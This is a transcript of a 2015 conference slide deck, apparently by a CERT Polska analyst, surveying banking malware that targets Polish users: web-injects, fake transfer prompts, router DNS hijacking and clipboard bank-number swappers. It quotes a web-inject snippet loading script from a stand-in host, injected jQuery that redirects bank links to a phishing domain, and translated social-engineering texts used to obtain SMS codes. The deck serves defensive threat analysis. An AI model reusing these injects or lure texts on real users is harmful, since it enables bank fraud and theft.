The Polish Money Stealing Scene

Transcript

1. The  Polish  Money  Stealing   Scene        

   Piotr  Kijewski   [email protected]   @piotrkijewski            29th  Jan  2015  

2. Main  actors   •  Web-­‐inject  malware   •  Hacked  home

    routers   •  Home  grown  “middle  income”  “banking”   malware  that  introduces  new  tricks       2  

3. SupporGng  actor   •  Classic  phishing  sGll  there   • 

   About  20  or  so  campaigns  against  Polish  banks   in  2014   •  Not  so  effecGve  against  two  factor   authenGcaGon          ….    but  they  do  collect  data   •  Widely  reported  in  media,  so  bad  PR  for  a   bank   3  

4. CASE  STUDY  #1:  WEB-­‐INJECT   MALWARE   4  

5. 2014/2015   •  VMZeus/KINS   •  Tinba   •  Kronos

     •  ISFB/Gozi2   5  

6. “Man  in  the  Browser”   6  

7. Web-­‐inject   Target  URL  :  “*/our  internet  bank/*”   data_before

      <head>   data_aeer    <body>   data_inject    <script  type=“text/javascript”  src=hhps:// evilserver.example/grabmoney.js”>   </script>   7  

8. Rise  of  the  Inject  Scenarios   8  

9. Cybercrime  made  easy  -­‐  ATS   9  

10. Scenarios   •  Web-­‐inject  scenarios  are  at  the  core  of

     money   thee   •  Bad  guys  test  transacGon  systems  for   elements  that  they  can  leverage  in  scenarios   •  Bad  guys  monitor  financial  sector  news  &   events  to  adapt  scenarios   •  Goal  is  to  bypass  two  factor  authenGcaGon  by   exploiGng  the  user     10  

11. “Erroneous  bank  transfer”   11  

12. “Defined  bank  transfer”   12  

13. “Defined  bank  transfer”   The Bank is changing the format

    of the account. Please confirm the operation, including the new account number should be specified as a recipient defined. New account number will be active after 7 days if the operation is not confirmed, the adoption of transfers on your account will be impossible. Please enter the code SMS number: 334 Note:  TranslaGon  reflects  original  crappy  Polish  text   13  

14. “Insurance”   Because of the growing prevalence of fraudulent transactions

    from accounts of customers all internet bank payments must be insured. payment amount for 300000zł - free payment amount over 300000zł - 50 zł Note:  TranslaGon  reflects  original  crappy  Polish  text   14  

15. “Cannot  idenGfy  your  computer”   The alarm system is not

    able to identify your computer. This may be due to a recent software update or a new IP address assigned by your ISP. In this case, you must authenticate the computer to avoid blocking the account. Please authorization by the token. Note:  TranslaGon  reflects  original  crappy  Polish  text   15  

16. “Trusted  phone  number”   We are updating the phone bank

    for sms code of <insert bank name> banking system to the safety of our customers we introduce secure line connection. You need to activate the new code SMS We take care of the safety of the banking system <insert bank name> Note:  TranslaGon  reflects  original  crappy  Polish  text   16  

17. QR  codes  anyone?   17  

18. CASE  STUDY  #2:  POWERZEUS  +  OTP   STEALER  APP  SCENARIO

      18  

19.     19  

20. PowerZeus/KINS   •  Started  targeGng  Polish  users  around  July  2013

      •  Combines  3  features:  webinjects  (Zeus),  plugin  API  (SpyEye),   code  injecGon  methods  used  by  Power  Loader  (Alureon)   •  Modules  downloaded  by  framework  (essenGally  what   PowerZeus  is)   •  Included  a  module  we  called  zeus-­‐dll  (encrypted  on  disk)   •  This  parGcular  instance  aimed  at  installing  the  poland.apk,   polska.apk,  e-­‐security.apk  on  an  Android   •  This  instance  used  .ru  domains  for  C&C  and  .pl  domains  for   malicous  app  distribuGon         20  

21. Command  features  …  +  steganography   •  get  info  

    – starts  with  #,  phone  no.  somewhere  in  message   •  new  number   – starts  with  /,  phone  no.  somewhere  in  message     •  fin   – starts  with  ,   •  uninstall   –   starts  with  !     +34  668  …   21  

22. Spanish  connecGon  …   fonyou.es  –  turns  out  C&C  

    number  was  virtual     22  

23. Sinkhole  stats  unique  IPs/day   Sample  date:   12/11/2013  

    Takedown  together  with  Kaspersky   23  

24. CASE  STUDY  #3:  HOME  ROUTER   HACKS   24  

25. iPhone  infecGon  ???   25  

26. DNS  redirecGon       26  

27. Scenario  1   27  

28. Scenario  1   The  following  code  was  injected  in  downloaded

     HTML:   <script>   jQuery(document).ready(funcGon()  {   jQuery('a[href*="ebgz.pl"]').ahr('href','hhp://ssl-­‐.ebgz.pl/');   jQuery('li  p  a.buhon.green').ahr('href','hhp://ssl-­‐.ebgz.pl/');   });   </script>   28  

29. Scenario  1   29  

30. Scenario  2   30  

31. CASE  STUDY  #4:  BANATRIX  AND   FRIENDS   31  

32. Bank  Account  Number  (BAN)     CCAAAAAAAABBBBBBBBBBBBBBBB     CC

     AAAA  AAAA  BBBB  BBBB  BBBB  BBBB     •  control  sum  (inline  with  IBAN  standard)   •  bank  number   •  account  number   32  

33. VBKlip  /  Banapter   •  A  simple  piece  of  VB

     (later  variants  in  .NET)   that  alters  contents  of  Windows  clipboard.   •  Any  string  of  26  digits  (opGonally  separated  by   whitespaces)  is  changed  to  another  one.   •  Early  versions  had  the  account  number   hardcoded,  currently  it’s  updated  from  a  C2   server.   33  

34. Demo:     hhp://youtu.be/TjOOaWE4Vq4         34  

35. Nearly  500k  PLN  lost   35  

36. Nearly  1mln  PLN  lost       hhp://www.tvn24.pl/jaworzno-­‐z-­‐konta-­‐zniknal-­‐niemal-­‐milion-­‐zlotych,507306,s.html   36

     

37. Banatrix   •  Banatrix  scans  memory  of  running  processes  that

      match  iexplore.exe,  firefox.exe,  chrome.exe,  and   opera.exe.   •  Similar  to  VBKlip/Banapter,  banatrix  changes  26-­‐digit   strings  to  a  different  one.   •  Monitoring  limited  to  one  browser  process,  may   crash  browser.   37  

38. Banatrix:  C&C  in  .onion   38  

39. Now  with  DGA   39  

40. Demo:     hhp://youtu.be/iyhRq7Pf1yY         40  

41. Future  Winner?     •  Ransomware   –   Older  Weelsof/Reveton

     in  2011/12  had  massive   impact   –   InteresGngly,  nothing  much  since  then   –   Cryptolocker,  Cryptowall  not  really  present   •  But  it  will  be  bad  when  it  hits   41  

42. Something  novel:  Banking  apps?   Src:  hhp://securityintelligence.com/svpeng-­‐mobile-­‐malware-­‐ expanding-­‐to-­‐new-­‐territories/#.VGTBZlfF95k   42

     

43. The  trend  we  see:  hacking  the  mind   src:  www.pocobor.com

      43  

44.             Contact:  [email protected],  [email protected]  

    Twiher:  @piotrkijewski,  @cert_polska_en   Web:  www.cert.pl   44